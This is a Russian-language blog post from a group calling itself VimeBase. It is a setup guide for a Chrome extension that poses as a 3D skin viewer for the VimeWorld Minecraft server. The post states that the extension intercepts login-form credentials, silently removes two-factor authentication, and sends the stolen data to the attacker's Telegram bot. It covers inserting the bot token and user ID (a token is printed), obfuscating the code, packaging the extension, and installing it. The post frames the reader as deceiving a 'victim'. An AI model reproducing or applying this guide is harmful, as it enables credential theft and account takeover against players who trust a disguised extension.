Join
База VimeWorld
@vimebase
April 16, 2021

Добавляем 3D скин на VimeWorld

Вступление

Мы всегда стараемся создавать что-то новое и удивлять наших читателей какими-то новыми фишками в сфере хакинга VimeWorld, но в этот раз речь пойдет совсем не о хакинге.

Ведь наша команда разработала расширение, заменяющее скучный 2D скин на изящную 3D модель, которую можно даже крутить под всеми ракурсами, а ещё она двигается.

Скачать расширение вы можете по ссылке в конце статьи.

Что же реально может это расширение?

Если вы правда подумали, что мы сделали что-то, что нельзя использовать для взлома, то сильно заблуждаетесь.

Оно и правда показывает ваш скин, который находится в личном кабинете, но это лишь малая часть для чего оно реально может применяться.

На самом же деле, это расширение может перехватывать данные с формы авторизации VimeWorld и отправлять их вам прямо в Telegram.

Ну и что? А какой смысл если у чела двушка?

И действительно, в этом не было бы большого смысла, если бы мы не добавили в него снятие этой самой двушки. Если у чела стоит аунтефикация, то расширение автоматически её снимет, тем самым вам придут логи уже чистые от двухи.

Благодаря наличию оригинальной идеи, которая реально работает, жертва вряд ли когда-то догадается, что её расширение перехватывает данные со страницы авторизации.

Я хочу себе такое!

Без проблем, сейчас расскажем как это все настроить.

Для начала качаем архив по ссылке: https://mega.nz/file/7rZRmAoC

Желательно распаковать, ведь нам придется иметь дело с содержимым.

Нам важны 2 файла:

  • manifest.json - внешний вид и описание расширения
  • script.js - конфиги фишинга

Если с первым все более-менее понятно, меняете описание, название, версию (первые 3 параметра), то со вторым могут возникнуть вопросы.

Открываем его и видим:

const tokenTG = "1778463175:AAHJdL4PxH58xgGlY3ZkoD7bR_5SqBrlCK4";
const userID = 1049676241;

Первый параметр это токен вашего бота Telegram.

Чтобы его получить, залетаем в https://t.me/BotFather

Пишем /newbot:

Придумываем ему название:

Придумываем ему username, чтобы в конце было bot:

Ну и все, ваш личный приспешник готов, он будет помогать вам во всех ваших нехороших делишках.

Копируем отсюда токен (он выделен особым цветом) и вставляем в конфиг.
BotFather предоставил вам ссылку на вашего бота, чтобы бот мог отправлять вам сообщения, вы должны ему что-нибудь написать.

Ну и чтобы бот понимал кому вообще писать, вам нужно указать свой ID, это можно сделать через бота: https://t.me/getmyid_bot

Копируете отсюда ID и вставляете в userID.

Ну в принципе это все, можем переходить к компиляции.

Если вам важна конфиденциальность

Если вы не хотите палить токен бота и ваш ID, то советуем обфусцировать код, т.е. сделать его нечитаемым обычному человеку.

Заходим на https://www.obfuscator.io/, вставляем туда эти две строки и кликаем Obfuscate:

Полученный код заменяем в своем файле, у вас получится что-то подобное:

Финал

Теперь можно компилировать расширение, для этого нужно запаковать содержимое вашей папки обратно в ZIP.

Как же добавить расширение в браузер?

Данное расширение работает только с браузерами, основанными на движке Chrome (Яндекс браузер, Opera, Edge), Firefox работать не будет.

Самый простой способ

Чтобы это сделать вам необходимо:

  • ввести в адресной строке: chrome://extensions/
  • включить режим разработчика (в зависимости от браузера будет по разному)
    в Google Chrome нужно поставить галочку в правом верхнем углу
  • загрузить ваше расширение (ZIP архив)
    в случае с хромом достаточно обновить страницу и перетащить архив на страницу

Замороченный способ

Компилируем расширение специально под браузер.

Для этого опять же переходим в chrome://extensions/

Кликаем на кнопочку упаковать расширение:

Ну и тут указываем путь до ПАПКИ, где лежит содержимое того архива, которое вы изменяли, второй параметр указывать не нужно:

Ну и в результате вы получите что-то такое:

Чтобы его добавить, можно попробовать просто кликнуть два раза, но не все браузеры позволяют так делать, поэтому придется устанавливать путем его перетаскивания на страницу chrome://extensions/

Не все браузеры поддерживают данный способ, могут заблокировать скомпилированное расширение, т.к. оно не с магазина Chrome, самый надежный вариант все же с архивом, но это будет выглядеть не так презентабельно.

В общем смотрите сами, экспериментируйте.

Итог

Сейчас мы с вами разобрали полный путь настройки расширения для перехвата данных авторизации VimeWorld.

Благодаря своей оригинальной идее, данное расширение скорее всего не вызовет подозрений у вашей жертвы, ведь многие хотели бы себе 3D человечка для просмотра скина прямо в личном кабинете VimeWorld, человек может вообще про него забыть, пока вам будут приходить логи с его аккаунтов.

Как пользователь будет добавлять его уже решаете вы, способы мы описали выше.

Устанавливая подобные расширения, вас не защитит даже двухэтапная аунтефикация, она снимается незаметно, чтобы владелец аккаунта этого даже не заметил.

Если вы немного разберетесь в данной теме, то сможете из этого расширения сделать что-то большее.

Будьте, осторожны, берегите свои аккаунты.

Статья подготовлена командой VimeBase в сугубо ознакомительных целях. Автор данной статьи не призывает использовать полученную в ней информацию.

Наш Telegram: https://t.me/basevw

Чекер Minecraft: https://t.me/checkmcbot
Чекер VimeWorld: https://t.me/vimebasebot
Сократи ссылку: https://t.me/vimelinkbot

April 16, 2021, 22:39
0 views
0 reactions